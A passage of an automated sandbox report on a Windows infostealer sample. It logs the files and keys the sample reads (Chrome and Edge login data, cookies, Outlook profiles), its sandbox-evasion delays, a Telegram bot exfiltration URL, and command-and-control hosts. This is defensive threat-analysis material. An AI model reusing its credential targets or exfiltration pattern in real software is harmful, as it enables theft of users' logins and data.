            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 4_2_004060BA FindFirstFileW,FindClose,4_2_004060BA
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595641Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595391Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594813Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594469Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594250Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeThread delayed: delay time: 594141Jump to behavior
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhMw
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
            Source: C:\Users\user\Desktop\Fa24c148.exeAPI call chain: ExitProcess graph end nodegraph_0-4821
            Source: C:\Users\user\Desktop\Fa24c148.exeAPI call chain: ExitProcess graph end nodegraph_0-4815
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060E1
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeProcess created: C:\Users\user\Desktop\Fa24c148.exe "C:\Users\user\Desktop\Fa24c148.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Users\user\Desktop\Fa24c148.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeCode function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405D99
            Source: C:\Users\user\Desktop\Fa24c148.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Fa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Fa24c148.exe PID: 1440, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            12
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Fa24c148.exe16%ReversingLabsWin32.Trojan.Garf
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nslCCA0.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://checkip.dyndns.org0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            142.250.185.206
            truefalse
              unknown
              drive.usercontent.google.com
              142.250.186.65
              truefalse
                unknown
                reallyfreegeoip.org
                188.114.97.3
                truetrue
                  unknown
                  api.telegram.org
                  149.154.167.220
                  truetrue
                    unknown
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      unknown
                      checkip.dyndns.org
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%2028/10/2024%20/%2022:44:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          unknown
                          https://reallyfreegeoip.org/xml/155.94.241.188false
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/Fa24c148.exe, 00000004.00000002.2951440746.00000000337B3000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000337A4000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://duckduckgo.com/chrome_newtabFa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://duckduckgo.com/ac/?q=Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://api.telegram.orgFa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoFa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://api.telegram.org/botFa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20aFa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://www.office.com/lBFa24c148.exe, 00000004.00000002.2951440746.00000000337AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://drive.usercontent.google.com/Fa24c148.exe, 00000004.00000003.2115761364.0000000002F76000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2930604280.0000000002F69000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://checkip.dyndns.orgFa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://nsis.sf.net/NSIS_ErrorErrorFa24c148.exefalse
                                          • URL Reputation: safe
                                          unknown
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Fa24c148.exe, 00000004.00000002.2952797218.0000000034699000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.00000000346E7000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336C9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034940000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003483D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003470E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://chrome.google.com/webstore?hl=enFa24c148.exe, 00000004.00000002.2951440746.0000000033782000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://reallyfreegeoip.org/xml/155.94.241.188$Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.0000000033637000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://www.ecosia.org/newtab/Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://varders.kozow.com:8081Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://aborters.duckdns.org:8081Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://ac.ecosia.org/autocomplete?q=Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.google.comFa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://drive.google.com/Fa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://anotherarmy.dns.army:8081Fa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallFa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchFa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://chrome.google.com/webstore?hl=enlBFa24c148.exe, 00000004.00000002.2951440746.000000003377D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://drive.google.com/oFa24c148.exe, 00000004.00000002.2930604280.0000000002F08000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://reallyfreegeoip.orgFa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.00000000336A4000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2951440746.000000003367D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://apis.google.comFa24c148.exe, 00000004.00000003.2078462414.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F6F000.00000004.00000020.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000003.2078376350.0000000002F7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesFa24c148.exe, 00000004.00000002.2952797218.00000000346E9000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034674000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003469F000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034843000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.0000000034818000.00000004.00000800.00020000.00000000.sdmp, Fa24c148.exe, 00000004.00000002.2952797218.000000003491B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFa24c148.exe, 00000004.00000002.2951440746.00000000335C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Fa24c148.exe, 00000004.00000002.2952797218.000000003488B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://reallyfreegeoip.org/xml/Fa24c148.exe, 00000004.00000002.2951440746.000000003360D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              api.telegram.orgUnited Kingdom
                                                              62041TELEGRAMRUtrue
                                                              142.250.185.206
                                                              drive.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              188.114.97.3
                                                              reallyfreegeoip.orgEuropean Union
                                                              13335CLOUDFLARENETUStrue
                                                              142.250.186.65
                                                              drive.usercontent.google.comUnited States
                                                              15169GOOGLEUSfalse
                                                              132.226.247.73
                                                              checkip.dyndns.comUnited States
                                                              16989UTMEMUSfalse
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1543766
                                                              Start date and time:2024-10-28 12:20:56 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 4s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:6
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Fa24c148.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@3/10@5/5
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 97%
                                                              • Number of executed functions: 184
                                                              • Number of non-executed functions: 137
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: Fa24c148.exe
                                                              TimeTypeDescription
                                                              07:22:35API Interceptor50373x Sleep call for process: Fa24c148.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              149.154.167.220AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    na.docGet hashmaliciousMassLogger RATBrowse
                                                                      na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                188.114.97.3PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                • www.cc101.pro/4hfb/
                                                                                QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                • filetransfer.io/data-package/cDXpxO66/download
                                                                                Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
